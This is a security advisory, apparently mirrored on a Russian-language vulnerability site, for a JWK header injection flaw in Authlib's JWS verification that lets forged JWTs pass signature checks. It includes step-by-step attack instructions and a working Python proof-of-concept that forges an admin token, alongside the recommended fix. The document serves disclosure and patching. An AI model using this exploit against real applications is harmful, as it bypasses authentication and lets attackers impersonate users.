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GHSA-wvwj-cvrp-7pv5

Опубликовано: 16 мар. 2026
Источник: github
Github: Прошло ревью
CVSS3: 9.1

Описание

Authlib JWS JWK Header Injection: Signature Verification Bypass

Description

Summary

A JWK Header Injection vulnerability in authlib's JWS implementation allows an unauthenticated attacker to forge arbitrary JWT tokens that pass signature verification. When key=None is passed to any JWS deserialization function, the library extracts and uses the cryptographic key embedded in the attacker-controlled JWT jwk header field. An attacker can sign a token with their own private key, embed the matching public key in the header, and have the server accept the forged token as cryptographically valid — bypassing authentication and authorization entirely.

This behavior violates RFC 7515 §4.1.3 and the validation algorithm defined in RFC 7515 §5.2.

Details

Vulnerable file: authlib/jose/rfc7515/jws.py
Vulnerable method: JsonWebSignature._prepare_algorithm_key()
Lines: 272–273

elif key is None and "jwk" in header: key = header["jwk"] # ← attacker-controlled key used for verification

When key=None is passed to jws.deserialize_compact(), jws.deserialize_json(), or jws.deserialize(), the library checks the JWT header for a jwk field. If present, it extracts that value — which is fully attacker-controlled — and uses it as the verification key.

RFC 7515 violations:

  • §4.1.3 explicitly states the jwk header parameter is "NOT RECOMMENDED" because keys embedded by the token submitter cannot be trusted as a verification anchor.
  • §5.2 (Validation Algorithm) specifies the verification key MUST come from the application context, not from the token itself. There is no step in the RFC that permits falling back to the jwk header when no application key is provided.

Why this is a library issue, not just a developer mistake:

The most common real-world trigger is a key resolver callable used for JWKS-based key lookup. A developer writes:

def lookup_key(header, payload): kid = header.get("kid") return jwks_cache.get(kid) # returns None when kid is unknown/rotated jws.deserialize_compact(token, lookup_key)

When an attacker submits a token with an unknown kid, the callable legitimately returns None. The library then silently falls through to key = header["jwk"], trusting the attacker's embedded key. The developer never wrote key=None — the library's fallback logic introduced it. The result looks like a verified token with no exception raised, making the substitution invisible.

Attack steps:

  1. Attacker generates an RSA or EC keypair.
  2. Attacker crafts a JWT payload with any desired claims (e.g. {"role": "admin"}).
  3. Attacker signs the JWT with their private key.
  4. Attacker embeds their public key in the JWT jwk header field.
  5. Attacker uses an unknown kid to cause the key resolver to return None.
  6. The library uses header["jwk"] for verification — signature passes.
  7. Forged claims are returned as authentic.

PoC

Tested against authlib 1.6.6 (HEAD a9e4cfee, Python 3.11).

Requirements:

pip install authlib cryptography

Exploit script:

from authlib.jose import JsonWebSignature, RSAKey import json jws = JsonWebSignature(["RS256"]) # Step 1: Attacker generates their own RSA keypair attacker_private = RSAKey.generate_key(2048, is_private=True) attacker_public_jwk = attacker_private.as_dict(is_private=False) # Step 2: Forge a JWT with elevated privileges, embed public key in header header = {"alg": "RS256", "jwk": attacker_public_jwk} forged_payload = json.dumps({"sub": "attacker", "role": "admin"}).encode() forged_token = jws.serialize_compact(header, forged_payload, attacker_private) # Step 3: Server decodes with key=None — token is accepted result = jws.deserialize_compact(forged_token, None) claims = json.loads(result["payload"]) print(claims) # {'sub': 'attacker', 'role': 'admin'} assert claims["role"] == "admin" # PASSES

Expected output:

{'sub': 'attacker', 'role': 'admin'}

Docker (self-contained reproduction):

sudo docker run --rm authlib-cve-poc:latest \ python3 /workspace/pocs/poc_auth001_jws_jwk_injection.py

Impact

This is an authentication and authorization bypass vulnerability. Any application using authlib's JWS deserialization is affected when:

  • key=None is passed directly, or
  • a key resolver callable returns None for unknown/rotated kid values (the common JWKS lookup pattern)

An unauthenticated attacker can impersonate any user or assume any privilege encoded in JWT claims (admin roles, scopes, user IDs) without possessing any legitimate credentials or server-side keys. The forged token is indistinguishable from a legitimate one — no exception is raised.

This is a violation of RFC 7515 §4.1.3 and §5.2. The spec is unambiguous: the jwk header parameter is "NOT RECOMMENDED" as a key source, and the validation key MUST come from the application context, not the token itself.

Minimal fix — remove the fallback from authlib/jose/rfc7515/jws.py:272-273:

# DELETE: elif key is None and "jwk" in header: key = header["jwk"]

Recommended safe replacement — raise explicitly when no key is resolved:

if key is None: raise MissingKeyError("No key provided and no valid key resolvable from context.")

Пакеты

Наименование

authlib

pip
Затронутые версииВерсия исправления

<= 1.6.8

1.6.9

EPSS

Процентиль: 20%
0.00064
Низкий

9.1 Critical

CVSS3

Дефекты

CWE-347

Связанные уязвимости

CVSS3: 9.1
ubuntu
11 дней назад

Authlib is a Python library which builds OAuth and OpenID Connect servers. Prior to version 1.6.9, a JWK Header Injection vulnerability in authlib's JWS implementation allows an unauthenticated attacker to forge arbitrary JWT tokens that pass signature verification. When key=None is passed to any JWS deserialization function, the library extracts and uses the cryptographic key embedded in the attacker-controlled JWT jwk header field. An attacker can sign a token with their own private key, embed the matching public key in the header, and have the server accept the forged token as cryptographically valid — bypassing authentication and authorization entirely. This issue has been patched in version 1.6.9.

CVSS3: 9.1
redhat
11 дней назад

A flaw was found in Authlib, a Python library used for creating secure authentication and authorization systems. This vulnerability, known as JWK (JSON Web Key) Header Injection, affects how Authlib verifies digital signatures in JWS (JSON Web Signature) tokens. An attacker can exploit this by creating a specially crafted token that includes their own cryptographic key in the header. When the system attempts to verify this token without a predefined key, it mistakenly uses the attacker's key, allowing them to bypass authentication and gain unauthorized access.

CVSS3: 9.1
nvd
11 дней назад

Authlib is a Python library which builds OAuth and OpenID Connect servers. Prior to version 1.6.9, a JWK Header Injection vulnerability in authlib's JWS implementation allows an unauthenticated attacker to forge arbitrary JWT tokens that pass signature verification. When key=None is passed to any JWS deserialization function, the library extracts and uses the cryptographic key embedded in the attacker-controlled JWT jwk header field. An attacker can sign a token with their own private key, embed the matching public key in the header, and have the server accept the forged token as cryptographically valid — bypassing authentication and authorization entirely. This issue has been patched in version 1.6.9.

CVSS3: 9.1
debian
11 дней назад

Authlib is a Python library which builds OAuth and OpenID Connect serv ...

EPSS

Процентиль: 20%
0.00064
Низкий

9.1 Critical

CVSS3

Дефекты

CWE-347